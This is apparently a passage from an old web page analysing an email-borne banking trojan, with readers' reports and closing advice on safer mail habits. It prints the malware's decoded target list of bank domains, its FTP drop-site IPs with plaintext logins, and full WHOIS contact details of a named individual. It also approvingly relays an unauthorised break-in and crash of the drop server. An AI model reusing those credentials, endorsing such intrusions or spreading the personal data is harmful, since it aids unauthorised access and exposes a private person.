hangseng.HSBC.bank.PIN.ufjbank.smbc.co.jp.btm.co.jp. rhbbank.com.ambg.com.my.affinbank.com.my.publicbank.com.my. Shinsei.jbic.go.jp.boj.or.jp.sanwabank.co.jp.stormpay.com. ccbusa.com.goldmoney.e-gold.e-bullion.tradeodds.com. datek.betonmarket.com.evocash.bancaja.es.santandercentralhispano.es. bancopopular.es.cajamadrid.es.caixapenedes.es.caixamanresa.es. caixatarragona.es.cme.com.fxall.com. bank.banc.e-gold.evocash.e-bullion.hangseng.HSBC.PIN.smbc.co.jp. btm.co.jp.rhbbank.com.ambg.com.my.Shinsei.jbic.go.jp.jbic.go.jp. stormpay.com.ccbusa.com.goldmoney.tradeodds.com.datek.betonmarket.com. santandercentralhispano.es.cajamadrid.es.caixapenedes.es.caixamanresa.es. caixatarragona.es.bot.or.th.banque.bnm.gov.my.dnb.nl. bundesbank.de.TAN.ecb.int.mas.gov.sg.snb.ch.federalreserve.gov. abnamro.com.aib.ie.bnl.it.ingbarings.com.bankofamerica.com. bmonesbittburns.com.barcap.com.bearstearns.com.bnpparibas.com. chase.com.consors.de.ca-indosuez.com.creditlyonnais.com.csfb.com. firstunion.com.intesabci.it.jp morgan.com.leuveninc.com.ldc.co.uk. nabmarkets.com.nomura.com.rbsmarkets.com.sakura.co.jp. salomonsmithbarney.com.scotiacapital.com.sg-ib.com.standardchartered.com. smbc.co.jp.csweb.co.jp.td.com.travelex.com.ubs.com.wachovia.com. wellsfargo.com.westlbmarkets.net.saxobank.com.e-trade.admin.clearstation.com. daytraders.com.decisionpoint.com.earningswhispers.com.investools.com. nni.nikkei.co.jp.stockwinners.com.tradetrek.com.brownco-apply.com. schwabtrader.com.processrequest.com.anz.com.olb.westpac.commbank.com.au. ambg.com.my.bpm.com.my.bcb.com.my.hhb.com.my.borneo-online.com.my.rba.gov.au. panamaoffshore.com.eib.org.offshore.53.com.amex.com.money.net.st.rim.or.jp. meigin.com.it-okinawa.or.jp.chb.com.tw.www2.japanexim.go.jp.www.gs.com. juroku.co.jp.iijnet.or.jp.mitsubishi-trust.co.jp.msdw.co.jp.ncb.co.jp. hirogin.co.jp.clariden.com.dahsing.com.hk.iba.com.hk.worldsec.com. unicredito.it.rzb.at.mevas.com.ibnk.bcif.fr.rzb.at.smc.fr. www.socgen.com.www.westlb.com.www.boh.com.cib.ibanking-services.com. internetonline2.com.agrolink.moa.my.maybank2u.com.my.bankrakyat.com. my.nwabank.co.jp.ufjbank.parex.ogress.banco
The files it installs are:
C:\WINDOWS\SYSTEM\~key.log keylogging file ?
C:\WINDOWS\SYSTEM\~post.log other post file ?
Files it refers to: spy.dll klgd.dll
Interesting info about the author:
g:\!Work\__Current\$0000_FHooker_Chazer\Release\TrojWithHooker.pdb
g:\!Work\__Current\$0000_FHooker_Chazer\Dll\Release\DLL.pdb
ProgLib.dll._Prog_HookAllApps@12
MoneyFtp (???)
The information (logfiles) is sent out to an FTP site that is UP as of yet. I informed the abuse department of the hosters of the FTP site and am giving them a chance to shut it down. It is not yet wise to include this particular information on your site, as there could be consequences for the people whose log is already collected.
And Jack emailed me:
I downloaded a.exe out of curiosity, and have been analysing it. The file contains a number of very interesting strings, which make it quite obvious that this program attempts to hijack the user's personal login information as they log in to various popular Internet banking services. The strings are (trivially) encrypted. However, once every character in a.exe is XOR'ed with 255, they appear. I have listed them below. Of particular interest are the five at the top. Seems as if the details are uploaded to one of two FTP sites, and the exploit may affect people using Opera as well as IE.
64.191.23.212 21 ircd thepassw0rd https http Internet Explorer Opera 69.93.102.218 21 logi bbzaza123 hangseng HSBC bank ufjbank smbc.co.jp btm.co.jp rhbbank.com ambg.com.my affinbank.com.my publicbank.com.my Shinsei jbic.go.jp boj.or.jp sanwabank.co.jp stormpay.com ccbusa.com goldmoney ... continues in similar vein, with 152 more strings.
I have found this very scary. I cannot believe how openly malicious this program actually is.
Feb 19th, 6PM: An anonymous hacker (hacker = good, cracker = bad) did us all a favor:
I logged in to the second FTP site that the malicious program sends the
account numbers to. I found it to be a rooted Linux box, where the
spammers had installed lots of unpleasant software, including email
address harvesters. A rather large number of account numbers had
also accumulated.
I deleted all the account numbers I could find, and then crashed the
computer. I believe that this was the best course of action to take,
given what was happening. Now, I hope, the sysadmin will take appropriate
action and patch his system. The machine is still down.
adversting.co.uk - Look, it's misspelt
Feb 16th, 12PM: Mike Richards did some research on the domain that a.exe is being pulled from. Here's what he found:
The site is registered in the UK and points to another mass marketing company called trafficdiscount.com. They are located in the US and their registration details are:
Registrant Name: Daniel Belcher
Registrant Organization: Slick Website Development
Registrant Address: 1111 Kathryn Rd.
Registrant City: Mt. Juliet
Registrant State/Province: TN
Registrant Postal Code: 37122
Registrant Country: US
Registrant Phone Number: +61.54434190
Registrant Fax Number: +.
Registrant Email: daniel@s-w-d.net
They are currently providing services through Wiltel.
Jason D. did some research on s-w-d.net and found:
Registrant:
Daniel Belcher (S-W-D-NET-DOM)
Slick Website Development
1111 Kathryn Rd.
Mt. Juliet, TN 37122
US
615-443-4190
615-444-5804
danielbelcher@worldnet.att.net
Domain Name: S-W-D.NET
Administrative Contact:
Daniel Belcher danielbelcher@worldnet.att.net
1111 Kathryn Rd.
Mt. Juliet, TN 37122
US
615-443-4190
Fax- 615-444-5804
Technical Contact, Zone Contact:
Daniel Belcher danielbelcher@worldnet.att.net
1111 Kathryn Rd.
Mt. Juliet, TN 37122
US
615-443-4190
Fax- 615-444-5804
Record last updated on 08-Apr-2003.
Record expires on 10-Nov-2007.
Record created on 10-Nov-2000.
Domain servers in listed order:
Name Server: ns1.slickwebsitedevelopment.com
Name Server: ns2.slickwebsitedevelopment.com
It appears that the 'registrant phone number' for adversting.co.uk is
misformatted and should really be 615-443-4190.
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=615-443-4190&btnG=Google+Search
Googling on this phone number also produces a 'Mary Belcher' at the same
address.
I don't know what this person's involvement is but it appears that they
are at least somewhat for real.
Feb 19th, 6PM: Ryan from Australia emailed me:
About November last year one of our
machines started doing strange things, so we went up and had a look at it.
It had something running in the background. We think it was a mail relay
trojan. We traced it back and that had been downloaded from
advertising.co.uk. The infected machine was sending out packets and
packets were trying to get back in, but were blocked by the firewall. If
it hadn't been 7pm at night, I probably would have set up a sniffer and
grabbed some info, but instead I cleaned things off and went home.
Looks like that site is not a nice one and I think I'll add it to my list
of sites to avoid.
Conclusion
If you're still using Outlook and Internet Explorer, this is a good time to find alternatives (I suggest Firefox and Thunderbird). Whatever you use, a couple of habits would have stopped this one: read mail as plain text, or at least with scripting, ActiveX and iframes disabled, and look at where a link actually goes before clicking it, since every link in this message displayed 123greetings.com while pointing at a bare IP address. Crackers and spammers are getting more and more sophisticated, and are finding ways to fool even experienced and skilled computer users.